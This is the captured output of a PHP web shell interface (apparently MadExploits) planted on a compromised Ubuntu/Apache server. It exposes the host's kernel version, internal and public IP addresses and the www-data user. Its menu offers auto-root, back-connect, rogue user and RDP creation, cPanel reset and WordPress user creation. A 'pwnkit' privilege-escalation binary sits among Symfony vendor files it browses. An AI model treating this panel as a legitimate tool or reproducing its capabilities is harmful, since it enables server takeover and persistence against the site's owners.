Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.147.72.31
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
vendor /
symfony /
security-guard /
[ HOME SHELL ]
Name
Size
Permission
Action
Authenticator
[ DIR ]
drwxrwxr-x
Firewall
[ DIR ]
drwxrwxr-x
Provider
[ DIR ]
drwxrwxr-x
Token
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
AbstractGuardAuthenticator.php
1.05
KB
-rw-rw-r--
AuthenticatorInterface.php
5.27
KB
-rw-rw-r--
GuardAuthenticatorHandler.php
5.19
KB
-rw-rw-r--
LICENSE
1.04
KB
-rw-rw-r--
PasswordAuthenticatedInterface...
624
B
-rw-rw-r--
README.md
598
B
-rw-rw-r--
composer.json
876
B
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AbstractGuardAuthenticator.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Security\Guard; use Symfony\Component\Security\Core\User\UserInterface; use Symfony\Component\Security\Guard\Token\PostAuthenticationGuardToken; /** * An optional base class that creates a PostAuthenticationGuardToken for you. * * @author Ryan Weaver <ryan@knpuniversity.com> */ abstract class AbstractGuardAuthenticator implements AuthenticatorInterface { /** * Shortcut to create a PostAuthenticationGuardToken for you, if you don't really * care about which authenticated token you're using. * * @return PostAuthenticationGuardToken */ public function createAuthenticatedToken(UserInterface $user, string $providerKey) { return new PostAuthenticationGuardToken( $user, $providerKey, $user->getRoles() ); } }
Close